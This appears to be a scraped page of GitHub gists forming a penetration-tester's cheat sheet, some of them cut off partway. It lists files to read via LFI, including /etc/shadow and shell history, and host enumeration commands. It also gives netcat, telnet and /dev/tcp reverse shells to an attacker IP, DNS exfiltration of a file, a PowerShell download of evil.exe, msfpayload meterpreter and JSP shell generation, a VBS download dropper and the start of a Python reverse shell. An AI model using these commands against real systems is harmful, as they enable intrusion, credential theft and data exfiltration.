This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Use these if you have a simple command shell through LFI or something similar. | |
/etc/issue (A message or system identification to be printed before the login prompt.) | |
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.) | |
/etc/passwd | |
/etc/group | |
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs) | |
/etc/shadow | |
/home/[USERNAME]/.bash_history or .profile | |
~/.bash_history or .profile |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// What system are we connected to? | |
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
// Get the hostname and username (if available) | |
hostname | |
echo %username% | |
// Get users | |
net users | |
net user [username] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Determine linux distribution and version | |
cat /etc/issue | |
cat /etc/*-release | |
cat /etc/lsb-release | |
cat /etc/redhat-release | |
// Determine kernel version - 32 or 64-bit? | |
cat /proc/version | |
uname -a | |
uname -mrs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#1 | |
nc <attacker_ip> <port> -e /bin/bash | |
#2 | |
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe | |
#3 | |
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1 | |
#4 | |
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe | |
#5 | |
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
On victim: | |
1. Hex encode the file to be transferred: | |
xxd -p secret file.hex | |
2. Read in each line and do a DNS lookup: | |
for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done | |
On attacker: | |
1. Capture DNS exfil packets | |
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com | |
2. Cut the exfilled hex from the DNS packet |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Transfer file from attacking box to victim | |
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://attackerip/evil.exe"""; $destination="""C:\destination_file.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# generate windows meterpreter on port 4444 that outputs an asp file | |
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.16.31 LPORT=4444 R | msfencode -o mwcb.asp -e generic/none -t asp | |
#generate jsp reverse tcp over port 443 | |
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 R > jsprev.jsp | |
#would likely need to add this jsp to a WAR file for deployment | |
jar -cvf jsprev.war * #from within the main war directory that also contains the WEB-INF dir | |
#simple javascript reverse shell over port 443 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#autorun script (session.rc) | |
migrate -k -n explorer.exe | |
multi_console_command -cl "getsystem","getuid" | |
get_env | |
checkvm | |
#setting msf to use autorunscript above | |
set autorunscript multiscript.rb -rc /home/ryan/session.rc |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo strUrl = WScript.Arguments.Item(0) > wget.vbs | |
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs | |
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs | |
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs | |
echo Err.Clear >> wget.vbs | |
echo Set http = Nothing >> wget.vbs | |
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# imports here | |
# Copyright 2012 TrustedSec, LLC. All rights reserved. | |
# | |
# This piece of software code is licensed under the FreeBSD license.. | |
# | |
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. | |
import socket,subprocess | |
HOST = '192.168.12.45' # The remote host | |
PORT = 443 # The same port as used by the server |
OlderNewer